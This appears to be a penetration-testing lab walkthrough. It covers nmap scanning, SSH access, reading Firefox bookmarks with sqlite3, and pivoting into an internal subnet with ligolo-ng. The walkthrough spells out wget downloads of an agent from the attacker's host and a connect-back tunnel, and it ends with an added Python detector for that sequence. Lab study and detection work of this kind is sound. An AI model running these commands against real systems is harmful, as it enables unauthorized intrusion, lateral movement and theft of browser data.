Dnotes

The document outlines the process for accessing and enumerating a target machine within a specified VPN scope, including scanning for available hosts and using tools like nmap and ligolo-ng for pivoting. It details the necessary commands for setting up a proxy and agent on both the attacker and victim machines to facilitate access to an internal IP range. Additionally, it provides instructions for extracting browser history and bookmarks from the target machine as part of the enumeration phase.

Notes:

Scope
Access VPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]

Initial Access
Scanning available hosts:
nmap -sn 192.168.80.0/24
PS: If you cannot discover the IPs, the server has temporary ping blocking enabled. You can scan the following IPs specifically.
We can see 1 host up; let's scan 192.168.80.10:
nmap -sC -sV 192.168.80.10

ssh [email protected]

Enumeration
Enumerating the machine gives a few leads to move forward. We saw that this machine also has another adapter, connected to a different network.

Browser history:
ls -la .mozilla/

cd .mozilla/firefox/

The profile directory name may vary on your infrastructure; identify it and use it accordingly.
cd b2rri1qd.default-release

sqlite3 places.sqlite
.tables
select * from moz_bookmarks;

Pivoting
You must use the latest version of ligolo.
We have to pivot because 192.168.98.0/24 is not directly accessible from the VPN network. We will use ligolo-ng for this.

# Attacker machine: download the proxy and the agent
# Proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz
tar -xvzf ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

# Agent
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

If the agent cannot be downloaded directly on the target machine, download it on the attacker machine, extract it, and then transfer it via an HTTP server.

tar -xvzf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# On the attacker machine

# On the target machine
wget http://10.10.200.104:8000/agent

Set up the ligolo-ng proxy on the attacker machine and the ligolo-ng agent on the victim machine:

# Attacker machine: create the tun interface
sudo ip tuntap add user kali mode tun ligolo

# Delete the 192.168.98.0/24 IP range from the tun0 interface:
sudo ip route del 192.168.98.0/24 dev tun0

# Bring up the ligolo interface:
sudo ip link set ligolo up

# Add the 192.168.98.0/24 IP range to the ligolo interface:
sudo ip route add 192.168.98.0/24 dev ligolo

# Start the proxy on the attacker server:
./proxy -selfcert -laddr 0.0.0.0:443

# Victim machine: make the agent executable, then connect back to the proxy.
# Replace 10.10.200.104 with your attacker IP address.
chmod +x agent
./agent -connect 10.10.200.104:443 -ignore-cert

On the attacker side:

On the ligolo-ng proxy, check the session & start the tunnel.
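
From the defender's side, the download, chmod and agent start shown above leave a recognisable sequence in process-execution logs. The following Python is an added example, not part of the original notes: it correlates that sequence per host over constructed sample events. The event format, host names and function names are assumptions.

```python
import re
import shlex
from datetime import datetime, timedelta

# Constructed process-execution events: (host, ISO time, user, command line).
# The first three mirror the download / chmod / run sequence from the notes;
# host names, users and the remaining lines are invented for this example.
SAMPLE_EVENTS = [
    ("web01", "2024-05-01T10:00:05", "dev", "wget http://10.10.200.104:8000/agent"),
    ("web01", "2024-05-01T10:00:20", "dev", "chmod +x agent"),
    ("web01", "2024-05-01T10:00:31", "dev",
     "./agent -connect 10.10.200.104:443 -ignore-cert"),
    ("web01", "2024-05-01T10:05:00", "root", "/usr/sbin/cron -f"),
    ("db01", "2024-05-01T11:00:00", "ops", "wget https://example.org/report.pdf"),
    ("db01", "2024-05-01T11:00:09", "ops", "chmod +x backup.sh"),
]

WINDOW = timedelta(minutes=10)  # how far back earlier stages still count
URL_RE = re.compile(r"^https?://[^/]+/(?:.*/)?([^/?#]+)")


def basename(path):
    return path.rsplit("/", 1)[-1]


def classify(cmdline):
    """Map a command line to (stage, file name), or (None, None)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in the logged command
        return None, None
    if not argv:
        return None, None
    tool = basename(argv[0])
    if tool in ("wget", "curl"):
        for arg in argv[1:]:
            match = URL_RE.match(arg)
            if match:
                return "download", match.group(1)
    # Symbolic modes only (+x, u+x, a+x); octal modes are not handled here.
    if tool == "chmod" and len(argv) >= 3 and "x" in argv[1]:
        return "chmod", basename(argv[-1])
    # Agent-style start: a connect-back target plus disabled TLS verification.
    if "-connect" in argv and "-ignore-cert" in argv:
        return "tunnel_exec", tool
    return None, None


def connect_peer(cmdline):
    """Return the host:port that follows -connect, if present."""
    argv = shlex.split(cmdline)
    idx = argv.index("-connect")
    return argv[idx + 1] if idx + 1 < len(argv) else None


def detect(events):
    """Correlate stages per (host, file) and return one alert per agent start."""
    seen = {}     # (host, file) -> {stage: datetime of last occurrence}
    alerts = []
    for host, ts, user, cmdline in sorted(events, key=lambda e: e[1]):
        stage, name = classify(cmdline)
        if stage is None:
            continue
        when = datetime.fromisoformat(ts)
        stages = seen.setdefault((host, name), {})
        stages[stage] = when
        if stage != "tunnel_exec":
            continue
        # The agent start is reportable by itself; a recent download and
        # chmod of the same file name raise the severity.
        chain = [s for s in ("download", "chmod")
                 if s in stages and when - stages[s] <= WINDOW]
        alerts.append({
            "host": host, "user": user, "time": ts, "binary": name,
            "peer": connect_peer(cmdline),
            "severity": "high" if len(chain) == 2 else "medium",
            "chain": chain + ["tunnel_exec"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The match on `-connect` together with `-ignore-cert` keys on the command line from the notes, so a renamed binary is still caught but changed flags are not; egress filtering of outbound 443 to unapproved peers covers that case.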
